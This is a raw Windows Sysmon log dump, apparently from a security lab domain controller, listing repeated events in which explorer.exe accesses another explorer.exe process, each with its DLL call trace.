16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 